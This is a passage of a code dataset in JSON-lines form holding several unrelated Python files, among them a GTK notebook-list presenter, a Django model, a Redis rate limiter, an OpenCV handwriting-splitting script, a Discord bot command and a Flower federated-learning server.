full_urls\n\n\n","repo_name":"rszymani/scraper-github","sub_path":"Service.py","file_name":"Service.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72419301848","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nimport workspace.recently_opened_notebooks_list.recently_opened_notebooks_list_viewgtk as viewgtk_notebook_list\nfrom app.service_locator import ServiceLocator\n\n\nclass 
RecentlyOpenedNotebooksListPresenter(object):\n\n def __init__(self, workspace, recently_opened_notebooks):\n self.sidebar = ServiceLocator.get_main_window().sidebar\n self.hbchooser = ServiceLocator.get_main_window().headerbar.hb_right.notebook_chooser\n self.kernelspecs = ServiceLocator.get_kernelspecs()\n self.workspace = workspace\n self.recently_opened_notebooks = recently_opened_notebooks\n self.recently_opened_notebooks.register_observer(self)\n\n def change_notification(self, change_code, notifying_object, parameter):\n\n if change_code == 'add_recently_opened_notebook':\n item = parameter\n\n for widget in [self.sidebar, self.hbchooser]:\n icon_normal = self.kernelspecs.get_normal_sidebar_icon(item['kernelname'])\n icon_active = self.kernelspecs.get_active_sidebar_icon(item['kernelname'])\n widget.recent_notebooks_list_view.add_item(item['pathname'], item['kernelname'], item['date'], icon_normal, icon_active)\n if widget.recent_notebooks_list_view.visible_items_count >= 1:\n widget.recent_notebooks_label_revealer.set_reveal_child(True)\n widget.recent_notebooks_list_view_wrapper.show_all()\n\n if change_code == 'remove_recently_opened_notebook':\n item = parameter\n\n for widget in [self.sidebar, self.hbchooser]:\n widget.recent_notebooks_list_view.remove_item_by_pathname(item['pathname'])\n if widget.recent_notebooks_list_view.visible_items_count < 1:\n widget.recent_notebooks_label_revealer.set_reveal_child(False)\n widget.recent_notebooks_list_view_wrapper.hide()\n\n\n","repo_name":"cvfosammmm/Porto","sub_path":"workspace/recently_opened_notebooks_list/recently_opened_notebooks_list_presenter.py","file_name":"recently_opened_notebooks_list_presenter.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"31"} +{"seq_id":"71467558488","text":"from django.db import models\nfrom blood_storage.models import BloodStorage\n\n# Create your models here.\n\n\nclass BloodCollection(models.Model):\n \"\"\"\n Blood collection event that collects blood for a certain BloodStorage object\n e.g. 
Blood donation event in Zagreb organized by the Red Cross Zagreb\n        storage = Crveni Kriz Zagreb\n\n    \"\"\"\n\n\n    name = models.CharField(max_length=50)\n\n    start_time = models.DateTimeField()\n    end_time = models.DateTimeField()\n\n    location_lat = models.FloatField(null=True)\n    location_lon = models.FloatField(null=True)\n\n    storage = models.ForeignKey(BloodStorage, on_delete=models.DO_NOTHING)\n\n\n    def __str__(self):\n        return self.name + \" \" + str(self.start_time) + \": \" + self.storage.name","repo_name":"aostrun/TryCodeCatchHackathon","sub_path":"django_template/blood_collection/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14493150479","text":"import os\nimport redis\nimport hashlib\nimport time\n\nimport urllib.parse as urlparse\n\nfrom app.schemas.schemas import TrackEvent\nfrom app.utils.constants import REDIS_SS_DELIMITER\n\nclass RedisClient:\n\n    def __init__(self):\n        endpoint_url = os.environ.get(\"REDIS_URL\", \"redis://127.0.0.1:6379\")\n        url = urlparse.urlparse(endpoint_url)\n        self.client = redis.StrictRedis(host=url.hostname, port=url.port, password=url.password, charset='utf-8', decode_responses=True)\n\n        # Default to every 10 minutes, TODO: make this configurable\n        self.DEFAULT_INTERVAL = 600\n\n        # Default to 1 token\n        self.DEFAULT_REFILL = 1\n\n    def _set(self, key, val, expiration):\n        return self.client.set(key, val, ex=expiration)\n\n    def _exists(self, key):\n        return self.client.get(key)\n\n    def _get(self, key, default_value=None):\n        val = self.client.get(key)\n\n        return val if val is not None else default_value\n\n    def _updateMessageHistory(self, userId, currentTime, messageId):\n        ssName = self._hashKey(userId)\n        self.client.zrem(ssName, messageId)\n        self.client.zadd(ssName, {messageId: currentTime})\n\n    def _cleanSortedSet(self, prevMessageIds, currentMessageIds, ssName):\n        messagesToClean = set(prevMessageIds).difference(set(currentMessageIds))\n        for idToDelete in messagesToClean:\n            print(f\"Deleting messageId {idToDelete} from {ssName} sorted set\")\n            self.client.zrem(ssName, idToDelete)\n\n    def rankMessages(self, userId, availableMessages):\n\n        idToMessage = {m.id: m for m in availableMessages}\n\n        ssName = self._hashKey(userId)\n        sortedMessageHistory = self.client.zrange(ssName, 0, -1, desc=False, withscores=True)\n\n        prevMessageIds = list(map(lambda x: int(x[0]), sortedMessageHistory))\n\n        # clean up messageIds that have been deleted\n        self._cleanSortedSet(prevMessageIds, idToMessage.keys(), ssName)\n\n        orderedCandidates = []\n        for candidateId, last_sent in sortedMessageHistory:\n            try:\n                orderedCandidates.append(idToMessage[int(candidateId)])\n                del idToMessage[int(candidateId)]\n            except KeyError:\n                print(f\"Did not find {candidateId} in the available messages!\")\n\n        # This prioritizes messages that have not been sent before\n        messagesToSend = [v for k, v in idToMessage.items()]\n\n        messagesToSend.extend(orderedCandidates)\n\n        for candidateMessage in messagesToSend:\n            yield candidateMessage\n\n\n    def checkMessage(self, userId, message):\n        print(f\"Checking rate limiting for user id {userId} and message id {message.id}\")\n        currentTime = time.time()\n        rawKey = f\"{userId}_{message.id}\"\n\n        refillKey = self._hashKey(rawKey) + \"_last_reset\"\n        bucketKey = self._hashKey(rawKey) + \"_tokens\"\n\n        lastRefilled = float(self._get(refillKey, currentTime))\n\n        # If the current time minus last refilled is 0 - it's the first request. 
We need to add both keys\n        if (currentTime - lastRefilled == 0) or (currentTime - lastRefilled) >= message.rule.seconds:\n            # expire refill tokens every day to clean up old messages\n            self._set(bucketKey, message.rule.tokens, message.rule.seconds)\n            self._set(refillKey, currentTime, message.rule.seconds)\n        else:\n            tokens_left = int(self._get(bucketKey))\n\n            if tokens_left < 1:\n                return False\n\n            self.client.decr(bucketKey, amount=1)\n        # Update/Add the message to the user's sorted set message history\n        self._updateMessageHistory(userId, currentTime, message.id)\n        return True\n\n    def _hashKey(self, rawKey):\n        return hashlib.sha512(str.encode(rawKey)).hexdigest()\n\n    def updateTrackRank(self, track_event: TrackEvent):\n        ssName = track_event.guild_id + \"_track_ranks\"\n        memberName = track_event.id + REDIS_SS_DELIMITER + track_event.title\n        self.client.zincrby(ssName, 1, memberName)\n\n    def getNTopTracks(self, guild_id:str, n: int):\n        ssName = guild_id + \"_track_ranks\"\n        return self.client.zrevrange(ssName, 0, n, withscores=True)\n","repo_name":"rhwang10/iduna","sub_path":"app/redis/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7099276598","text":"# to thicken the pen strokes\n\nimport numpy as np\nimport cv2\n\n# read\nimg = cv2.imread('1new.png', cv2.IMREAD_GRAYSCALE)\n\n# increase contrast\npxmin = np.min(img)\npxmax = np.max(img)\nimgContrast = (img - pxmin) / (pxmax - pxmin) * 255\n\n# increase line width\nkernel = np.ones((3, 3), np.uint8)\nimgMorph = cv2.erode(imgContrast, kernel, iterations = 5)\n\n# write\ncv2.imwrite('mid0.png', imgMorph)\n\n##############################################################################\n\n# split the sheet into per-character strips by scanning for blank columns\nnew_a = []\ntracker = 0\nwhile True:\n#\timg = imgMorph # Read in the image and convert to grayscale\n\t\n\t#print(img.shape)\n\t#print(gray.shape)\n\timg = cv2.imread('mid'+str(tracker)+'.png') # Read in the image and convert to grayscale\n\ttracker += 1\n\n\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\tgray = 255*(gray < 128).astype(np.uint8) # To invert the text to white\n\n\n\ta = 0\n\tb = 0\n\tcount = 0\n\tflag = True\n\t\n\tfor j in range(len(gray[0])):\n\t\ta = 0\n\t\tfor i in range(len(gray)):\n\t\t\ta += gray[i][j]\n\t\tif(a==0 and b!=0 and count > 100):\n\t\t\tbreak\n\t\tif(a==0 and b!=0):\n\t\t\tcount += 1\n\t\telif(a!=0):\n\t\t\tb = 1\n#\tprint(type(a))\n\tp = img[:, :j+1]\n\tq = img[:, j+1:]\n\tnew_a.append(p)\n\t\n\tif q.size == 0:\n\t\t# nothing left to the right of the last strip, so stop splitting\n\t\tprint(tracker)\n\t\tbreak\n\tcv2.imwrite('znew2.png', q)\n\tcv2.imwrite('mid'+str(tracker)+'.png',q)\t\n\t#\tprint(np.shape(gray))\n#\tcv2.imwrite('znew1.png', p)\n\n#\tcv2.imwrite('znew2.png', q)\n\n#cv2.imshow(\"Cropped\", new_a[1]) # Show it\n#cv2.waitKey(0)\n\n\t\n###############################################################################\n\nfor i in range(len(new_a)):\n\ttry:\n\t\timg = new_a[i] # Read in the image and convert to grayscale\n\t\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t\tgray = 255*(gray < 128).astype(np.uint8) # To invert the text to white\n\t\tcoords = cv2.findNonZero(gray) # Find all non-zero points (text)\n\n\n\t\tx, y, w, h = cv2.boundingRect(coords) # Find minimum spanning bounding box\n\t\trect = img[y:y+h, x:x+w] # Crop the image - note we do this on the original image\n\t\t#cv2.imshow(\"Cropped\", rect) # Show 
it\n\t\t#cv2.waitKey(0)\n\t\tcv2.destroyAllWindows()\n\t\tcv2.imwrite(\"new\"+str(i)+\".png\", rect) # Save the image\n\texcept:\n\t\tbreak\n","repo_name":"VatsalLalcheta/HandWrittenText-Recognition-From-Form","sub_path":"HWTR/a/check/final_pre_process.py","file_name":"final_pre_process.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15369713876","text":"import discord\nimport aiohttp\nimport re\n\nfrom discord import app_commands\nfrom autocomplete import name_autocomplete\nfrom utils import lounge_data\nfrom datetime import datetime, timedelta\n\n\n@app_commands.command()\n@app_commands.autocomplete(player=name_autocomplete)\n@app_commands.describe(player=\"The player you want to check lounge name history from\")\nasync def name_history(interaction: discord.Interaction, player: str = None):\n \"\"\"lounge name history of a player\"\"\"\n\n embed = discord.Embed(color=0x47e0ff, title=\"name history\")\n\n if not player:\n async with aiohttp.ClientSession() as session:\n async with session.get(\"https://www.mk8dx-lounge.com/api/player?discordId=\"+str(interaction.user.id)) as response:\n if response.status == 200:\n user_data = await response.json()\n player = user_data['name']\n else:\n return await interaction.response.send_message(content=\"could not found your account in the lounge\", ephemeral=True)\n\n async with aiohttp.ClientSession() as session:\n async with session.get(\"https://www.mk8dx-lounge.com/api/player/details?name=\"+player) as response:\n if response.status == 200:\n data = await response.json()\n\n next_change = round(datetime.fromisoformat(data['nameHistory'][0]['changedOn']).timestamp() + timedelta(days=60).total_seconds())\n embed.add_field(name=\"next change\", value=f\" \", inline=False)\n\n name_history_string = \"\"\n for change in data['nameHistory']:\n name_history_string += f\": {change['name']}\\n\"\n\n embed.add_field(name=\"name change\", value=name_history_string, inline=False)\n\n else:\n embed.description = \"player not found\"\n\n await interaction.response.send_message(embed=embed)\n\n\nasync def setup(bot):\n bot.tree.add_command(name_history)\n","repo_name":"prismillon/Quaxly","sub_path":"cogs/name_history.py","file_name":"name_history.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"12334915062","text":"'''\n예산\nhttps://programmers.co.kr/learn/courses/30/lessons/12982\n'''\n\ndef solution(d, budget):\n d.sort()\n for i in range(len(d), -1, -1):\n if sum(d[:i]) <= budget:\n return i\n return 0\n\nprint(solution([1,3,2,5,4], 9))","repo_name":"lastosellie/algorithm","sub_path":"Programmers/12982.py","file_name":"12982.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43808705916","text":"from argparse import ArgumentParser\nfrom configparser import ConfigParser\nfrom flwr.common import Metrics, NDArrays, Parameters\nfrom flwr.server import Server, ServerConfig, SimpleClientManager, start_server\nfrom flwr.server.strategy import FedAvg, FedAvgM, Strategy\nfrom logging import FileHandler, Formatter, getLevelName, Logger, StreamHandler\nfrom pathlib import Path\nfrom pymonetdb import connect\nfrom random import choice\nfrom re import findall\nfrom time import perf_counter\nfrom typing import Any, List, Optional, Tuple\n\nfrom 
dfa_lib_python.dataflow import Dataflow\nfrom dfa_lib_python.transformation import Transformation\nfrom dfa_lib_python.attribute import Attribute\nfrom dfa_lib_python.attribute_type import AttributeType\nfrom dfa_lib_python.set import Set\nfrom dfa_lib_python.set_type import SetType\nfrom dfa_lib_python.task import Task\nfrom dfa_lib_python.dataset import DataSet\nfrom dfa_lib_python.element import Element\nfrom dfa_lib_python.task_status import TaskStatus\nfrom dfa_lib_python.extractor_extension import ExtractorExtension\nfrom dfa_lib_python.dependency import Dependency\nimport time\nimport pymonetdb\n\n\ndataflow_tag = \"flower-df\"\n\n\nclass FlowerServer:\n    def __init__(self, server_id: int, server_config_file: Path) -> None:\n        # Server's ID and Config File.\n        self.server_id = server_id\n        self.server_config_file = server_config_file\n        # Server's Config File Settings.\n        self.general_settings = None\n        self.logging_settings = None\n        self.fl_settings = None\n        self.ssl_settings = None\n        self.grpc_settings = None\n        self.training_hyper_parameters_settings = None\n        self.testing_hyper_parameters_settings = None\n        self.hyper_parameters_dynamic_adjustment_settings = None\n        self.adjustments_policies_settings = None\n        self.training_hyper_parameters_dynamic_adjustment_settings = None\n        self.testing_hyper_parameters_dynamic_adjustment_settings = None\n        self.monetdb_settings = None\n        # Other Attributes.\n        self.logger = None\n        self.flower_server = None\n        self.flower_server_config = None\n        self.fl_round = None\n        self.fit_config = None\n        self.evaluate_config = None\n        self.initial_global_model_parameters = None\n        self.global_model_parameters = None\n\n    @staticmethod\n    def parse_config_section(config_parser: ConfigParser, section_name: str) -> dict:\n        parsed_section = {\n            key: value for key, value in config_parser[section_name].items()\n        }\n        for key, value in parsed_section.items():\n            if value == \"None\":\n                parsed_section[key] = None\n            elif value in [\"True\", \"Yes\"]:\n                parsed_section[key] = True\n            elif value in [\"False\", \"No\"]:\n                parsed_section[key] = False\n            elif value.isdigit():\n                parsed_section[key] = int(value)\n            elif value.replace(\".\", \"\", 1).isdigit():\n                parsed_section[key] = float(value)\n            elif not findall(r\"%\\(.*?\\)s+\", value) and findall(r\"\\[.*?]+\", value):\n                aux_list = (\n                    value.replace(\"[\", \"\").replace(\"]\", \"\").replace(\" \", \"\").split(\",\")\n                )\n                for index, item in enumerate(aux_list):\n                    if item.isdigit():\n                        aux_list[index] = int(item)\n                    elif item.replace(\".\", \"\", 1).isdigit():\n                        aux_list[index] = float(item)\n                parsed_section[key] = aux_list\n            elif not findall(r\"%\\(.*?\\)s+\", value) and findall(r\"\\(.*?\\)+\", value):\n                aux_list = (\n                    value.replace(\"(\", \"\").replace(\")\", \"\").replace(\" \", \"\").split(\",\")\n                )\n                for index, item in enumerate(aux_list):\n                    if item.isdigit():\n                        aux_list[index] = int(item)\n                    elif item.replace(\".\", \"\", 1).isdigit():\n                        aux_list[index] = float(item)\n                parsed_section[key] = tuple(aux_list)\n            elif not findall(r\"%\\(.*?\\)s+\", value) and findall(r\"\\{.*?}+\", value):\n                aux_dict = {}\n                aux_list = (\n                    value.replace(\"{\", \"\").replace(\"}\", \"\").replace(\" \", \"\").split(\",\")\n                )\n                for item in aux_list:\n                    pair_item = item.split(\":\")\n                    pair_key = pair_item[0]\n                    pair_value = pair_item[1]\n                    if pair_value == \"None\":\n                        pair_value = None\n                    elif pair_value in [\"True\", \"Yes\"]:\n                        pair_value = True\n                    elif pair_value in [\"False\", \"No\"]:\n                        pair_value = False\n                    elif pair_value.isdigit():\n                        pair_value = int(pair_value)  # convert the pair's own value, not the raw section string\n                    
elif pair_value.replace(\".\", \"\", 1).isdigit():\n pair_value = float(value)\n aux_dict.update({pair_key: pair_value})\n parsed_section[key] = aux_dict\n return parsed_section\n\n def set_attribute(self, attribute_name: str, attribute_value: Any) -> None:\n setattr(self, attribute_name, attribute_value)\n\n def get_attribute(self, attribute_name: str) -> Any:\n return getattr(self, attribute_name)\n\n def parse_flower_server_config_file(self) -> None:\n # Get Server's Config File.\n server_config_file = self.get_attribute(\"server_config_file\")\n # Init ConfigParser Object.\n cp = ConfigParser()\n cp.optionxform = str\n cp.read(filenames=server_config_file, encoding=\"utf-8\")\n # Parse 'General Settings' and Set Attributes.\n general_settings = self.parse_config_section(cp, \"General Settings\")\n self.set_attribute(\"general_settings\", general_settings)\n # If Logging is Enabled...\n if general_settings[\"enable_logging\"]:\n # Parse 'Logging Settings' and Set Attributes.\n logging_settings = self.parse_config_section(cp, \"Logging Settings\")\n self.set_attribute(\"logging_settings\", logging_settings)\n # Parse 'FL Settings' and Set Attributes.\n fl_settings = self.parse_config_section(cp, \"FL Settings\")\n\n attributes = [\n \"num_rounds\",\n \"round_timeout_in_seconds\",\n \"accept_rounds_containing_failures\",\n \"enable_ssl\",\n \"enable_dynamic_adjustment\",\n \"server_aggregation_strategy\",\n \"fraction_fit\",\n \"fraction_evaluate\",\n \"min_fit_clients\",\n \"min_evaluate_clients\",\n \"min_available_clients\",\n ]\n to_dfanalyzer = [fl_settings.get(attr, None) for attr in attributes]\n t1 = Task(1, dataflow_tag, \"ServerConfig\")\n\n t1.begin()\n\n self.set_attribute(\"fl_settings\", fl_settings)\n\n # If SSL is Enabled...\n if fl_settings[\"enable_ssl\"]:\n # Parse 'SSL Settings' and Set Attributes.\n ssl_settings = self.parse_config_section(cp, \"SSL Settings\")\n self.set_attribute(\"ssl_settings\", ssl_settings)\n # Parse 'gRPC Settings' and Set Attributes.\n grpc_settings = self.parse_config_section(cp, \"gRPC Settings\")\n self.set_attribute(\"grpc_settings\", grpc_settings)\n\n t1_input = DataSet(\n \"iServerConfig\",\n [\n Element(\n [\n self.server_id,\n str(grpc_settings[\"grpc_listen_ip_address\"])\n + str(grpc_settings[\"grpc_listen_port\"]),\n grpc_settings[\"grpc_max_message_length_in_bytes\"],\n ]\n + to_dfanalyzer\n )\n ],\n )\n t1.add_dataset(t1_input)\n t1_output = DataSet(\"oServerConfig\", [Element([])])\n t1.add_dataset(t1_output)\n t1.end()\n # Parse 'Training Hyper-parameters Settings' and Set Attributes.\n training_hyper_parameters_settings = self.parse_config_section(\n cp, \"Training Hyper-parameters Settings\"\n )\n self.set_attribute(\n \"training_hyper_parameters_settings\", training_hyper_parameters_settings\n )\n # Parse 'Testing Hyper-parameters Settings' and Set Attributes.\n testing_hyper_parameters_settings = self.parse_config_section(\n cp, \"Testing Hyper-parameters Settings\"\n )\n self.set_attribute(\n \"testing_hyper_parameters_settings\", testing_hyper_parameters_settings\n )\n # If Dynamic Adjustment of Hyper-parameters is Enabled...\n if fl_settings[\"enable_hyper_parameters_dynamic_adjustment\"]:\n # Parse 'Hyper-parameters Dynamic Adjustment Settings' and Set Attributes.\n hyper_parameters_dynamic_adjustment_settings = self.parse_config_section(\n cp, \"Hyper-parameters Dynamic Adjustment Settings\"\n )\n self.set_attribute(\n \"hyper_parameters_dynamic_adjustment_settings\",\n hyper_parameters_dynamic_adjustment_settings,\n 
)\n # Parse 'Adjustments Policies Settings' and Set Attributes.\n adjustments_policies_settings = self.parse_config_section(\n cp, \"Adjustments Policies Settings\"\n )\n self.set_attribute(\n \"adjustments_policies_settings\", adjustments_policies_settings\n )\n # If Dynamic Adjustment of Training Hyper-parameters is Enabled...\n if hyper_parameters_dynamic_adjustment_settings[\n \"dynamically_adjust_training_hyper_parameters\"\n ]:\n # Parse 'Training Hyper-parameters Dynamic Adjustment Settings' and Set Attributes.\n training_hyper_parameters_dynamic_adjustment_settings = (\n self.parse_config_section(\n cp, \"Training Hyper-parameters Dynamic Adjustment Settings\"\n )\n )\n self.set_attribute(\n \"training_hyper_parameters_dynamic_adjustment_settings\",\n training_hyper_parameters_dynamic_adjustment_settings,\n )\n # If Dynamic Adjustment of Testing Hyper-parameters is Enabled...\n if hyper_parameters_dynamic_adjustment_settings[\n \"dynamically_adjust_testing_hyper_parameters\"\n ]:\n # Parse 'Testing Hyper-parameters Dynamic Adjustment Settings' and Set Attributes.\n testing_hyper_parameters_dynamic_adjustment_settings = (\n self.parse_config_section(\n cp, \"Testing Hyper-parameters Dynamic Adjustment Settings\"\n )\n )\n self.set_attribute(\n \"testing_hyper_parameters_dynamic_adjustment_settings\",\n testing_hyper_parameters_dynamic_adjustment_settings,\n )\n # If MonetDB is the Hyper-parameters Adjustments Eligibility Controller...\n if (\n hyper_parameters_dynamic_adjustment_settings[\n \"adjustments_eligibility_controller\"\n ]\n == \"MonetDB\"\n ):\n\n ###########################\n # -------- MODIFIED --------\n # Parse 'MonetDB Settings' and Set Attributes.\n monetdb_settings = cp[\"MonetDB Settings\"]\n self.set_attribute(\"monetdb_settings\", monetdb_settings)\n ###########################\n\n # Unbind ConfigParser Object (Garbage Collector).\n del cp\n\n def load_logger(self) -> Optional[Logger]:\n logger = None\n general_settings = self.get_attribute(\"general_settings\")\n if general_settings[\"enable_logging\"]:\n logger_name = \"FlowerServer_\" + str(self.get_attribute(\"server_id\"))\n logging_settings = self.get_attribute(\"logging_settings\")\n logger = Logger(name=logger_name, level=logging_settings[\"level\"])\n formatter = Formatter(\n fmt=logging_settings[\"format\"], datefmt=logging_settings[\"date_format\"]\n )\n if logging_settings[\"log_to_file\"]:\n file_parents_path = findall(\"(.*/)\", logging_settings[\"file_name\"])\n if file_parents_path:\n Path(file_parents_path[0]).mkdir(parents=True, exist_ok=True)\n file_handler = FileHandler(\n filename=logging_settings[\"file_name\"],\n mode=logging_settings[\"file_mode\"],\n encoding=logging_settings[\"encoding\"],\n )\n file_handler.setLevel(logger.getEffectiveLevel())\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n if logging_settings[\"log_to_console\"]:\n console_handler = StreamHandler()\n console_handler.setLevel(logger.getEffectiveLevel())\n console_handler.setFormatter(formatter)\n logger.addHandler(console_handler)\n return logger\n\n def log_message(self, message: str, message_level: str) -> None:\n logger = self.get_attribute(\"logger\")\n if logger and getLevelName(logger.getEffectiveLevel()) != \"NOTSET\":\n if message_level == \"DEBUG\":\n logger.debug(msg=message)\n elif message_level == \"INFO\":\n logger.info(msg=message)\n elif message_level == \"WARNING\":\n logger.warning(msg=message)\n elif message_level == \"ERROR\":\n logger.error(msg=message)\n elif 
message_level == \"CRITICAL\":\n logger.critical(msg=message)\n\n @staticmethod\n def load_initial_global_model_parameters() -> Optional[Parameters]:\n \"\"\"Server-side parameter initialization. A powerful mechanism which can be used, for example:\n \\n - To resume the training from a previously saved checkpoint;\n \\n - To implement hybrid approaches, such as to fine-tune a pre-trained model using federated learning.\n \\n If no parameters are returned, the server will randomly select one client and ask its parameters.\"\"\"\n # TODO: To Implement (If Ever Needed)...\n return None\n\n def load_initial_fit_config(self) -> dict:\n training_hyper_parameters_settings = self.get_attribute(\n \"training_hyper_parameters_settings\"\n )\n fit_config = {\"fl_round\": 0}\n fit_config.update(training_hyper_parameters_settings)\n # Log the Initial Training Configuration (If Logger is Enabled for \"DEBUG\" Level).\n message = \"[Server {0} | FL Round {1}] Initial Fit Config: {2}\".format(\n self.get_attribute(\"server_id\"), fit_config[\"fl_round\"], fit_config\n )\n self.log_message(message, \"DEBUG\")\n return fit_config\n\n def load_initial_evaluate_config(self) -> dict:\n testing_hyper_parameters_settings = self.get_attribute(\n \"testing_hyper_parameters_settings\"\n )\n evaluate_config = {\"fl_round\": 0}\n evaluate_config.update(testing_hyper_parameters_settings)\n # Log the Initial Testing Configuration (If Logger is Enabled for \"DEBUG\" Level).\n message = \"[Server {0} | FL Round {1}] Initial Evaluate Config: {2}\".format(\n self.get_attribute(\"server_id\"),\n evaluate_config[\"fl_round\"],\n evaluate_config,\n )\n self.log_message(message, \"DEBUG\")\n return evaluate_config\n\n def get_grpc_listen_ip_address_and_port(self) -> str:\n grpc_settings = self.get_attribute(\"grpc_settings\")\n return (\n grpc_settings[\"grpc_listen_ip_address\"]\n + \":\"\n + str(grpc_settings[\"grpc_listen_port\"])\n )\n\n def get_grpc_max_message_length_in_bytes(self) -> int:\n return self.get_attribute(\"grpc_settings\")[\"grpc_max_message_length_in_bytes\"]\n\n @staticmethod\n def instantiate_simple_client_manager() -> SimpleClientManager:\n return SimpleClientManager()\n\n @staticmethod\n def evaluate_fn(\n fl_round: int, global_model_parameters: NDArrays, evaluate_config: dict\n ) -> Optional[Metrics]:\n \"\"\"Server-side (Centralized) evaluation function called by Flower after every training round.\n \\nRequires a server-side dataset to evaluate the newly aggregated model without sending it to the Clients.\n \\nThe 'losses_centralized' and 'metrics_centralized' will only contain values using this centralized evaluation.\n \\nAlternative: Client-side (Federated) evaluation.\"\"\"\n # TODO: To Implement (If Ever Needed)...\n return None\n\n def is_enabled_hyper_parameters_dynamic_adjustment(self, phase: str) -> bool:\n hyper_parameters_dynamic_adjustment_settings = self.get_attribute(\n \"hyper_parameters_dynamic_adjustment_settings\"\n )\n if hyper_parameters_dynamic_adjustment_settings:\n if phase == \"train\":\n return hyper_parameters_dynamic_adjustment_settings[\n \"dynamically_adjust_training_hyper_parameters\"\n ]\n elif phase == \"test\":\n return hyper_parameters_dynamic_adjustment_settings[\n \"dynamically_adjust_testing_hyper_parameters\"\n ]\n return False\n\n def execute_random_eligibility(self, phase: str) -> bool:\n random_eligibility_start = perf_counter()\n is_fl_round_eligible = choice([True, False])\n random_eligibility_end = perf_counter() - random_eligibility_start\n message = 
\"[Server {0}] Finished Executing the Random Eligibility ({1}ing Phase) in {2} Seconds.\".format(\n self.get_attribute(\"server_id\"), phase.capitalize(), random_eligibility_end\n )\n self.log_message(message, \"INFO\")\n return is_fl_round_eligible\n\n def execute_monetdb_eligibility_query(self, phase: str) -> bool:\n monetdb_eligibility_query_start = perf_counter()\n monetdb_settings = self.get_attribute(\"monetdb_settings\")\n adjustments_eligibility_query = None\n if phase == \"train\":\n adjustments_eligibility_query = monetdb_settings[\n \"training_adjustments_eligibility_query\"\n ]\n elif phase == \"test\":\n adjustments_eligibility_query = monetdb_settings[\n \"testing_adjustments_eligibility_query\"\n ]\n if adjustments_eligibility_query is None:\n return False\n\n connection = connect(\n hostname=monetdb_settings[\"hostname\"],\n port=monetdb_settings[\"port\"],\n username=monetdb_settings[\"username\"],\n password=monetdb_settings[\"password\"],\n database=monetdb_settings[\"database\"],\n )\n\n cursor = connection.cursor()\n\n result = None\n tries = 0\n fl_round = self.get_attribute(\"fl_round\")\n while tries < 100 and not result:\n cursor.execute(\n monetdb_settings[\"check_if_last_round_is_already_recorded\"].format(\n fl_round\n )\n )\n connection.commit()\n result = cursor.fetchone()\n\n if result:\n result = result[-1]\n tries += 1\n time.sleep(0.05)\n\n if result:\n cursor.execute(operation=adjustments_eligibility_query.format(fl_round))\n query_result = int(cursor.fetchone()[0])\n else:\n query_result = 0\n cursor.close()\n connection.close()\n is_fl_round_eligible = True if query_result == 1 else False\n monetdb_eligibility_query_end = perf_counter() - monetdb_eligibility_query_start\n message = \"[Server {0}] Finished Executing the MonetDB Eligibility Query ({1}ing Phase) in {2} Seconds.\".format(\n self.get_attribute(\"server_id\"),\n phase.capitalize(),\n monetdb_eligibility_query_end,\n )\n self.log_message(message, \"INFO\")\n return is_fl_round_eligible\n\n def is_fl_round_eligible_for_hyper_parameters_dynamic_adjustment(\n self, phase: str\n ) -> bool:\n hyper_parameters_dynamic_adjustment_settings = self.get_attribute(\n \"hyper_parameters_dynamic_adjustment_settings\"\n )\n initial_round_candidate_for_adjustments = (\n hyper_parameters_dynamic_adjustment_settings[\n \"initial_round_candidate_for_adjustments\"\n ]\n )\n fl_round = self.get_attribute(\"fl_round\")\n if fl_round < initial_round_candidate_for_adjustments:\n return False\n adjustments_eligibility_controller = (\n hyper_parameters_dynamic_adjustment_settings[\n \"adjustments_eligibility_controller\"\n ]\n )\n if adjustments_eligibility_controller == \"Random\":\n return self.execute_random_eligibility(phase)\n if adjustments_eligibility_controller == \"MonetDB\":\n return self.execute_monetdb_eligibility_query(phase)\n\n def adjust_hyper_parameter_value(\n self, old_value: Any, adjustment_policy: str\n ) -> Any:\n adjusted_value = None\n adjustment_operation_text = self.get_attribute(\"adjustments_policies_settings\")[\n adjustment_policy\n ]\n if \"boolean\" in adjustment_policy:\n if adjustment_operation_text == \"Flip\":\n adjusted_value = not old_value\n elif \"numerical\" in adjustment_policy:\n factor = findall(r\"[-+]?\\d*\\.?\\d+|[-+]?\\d+\", adjustment_operation_text)[0]\n if factor.isdigit():\n factor = int(factor)\n elif factor.replace(\".\", \"\", 1).isdigit():\n factor = float(factor)\n operation_text = \" \".join(findall(r\"[a-zA-Z]+\", adjustment_operation_text))\n if operation_text 
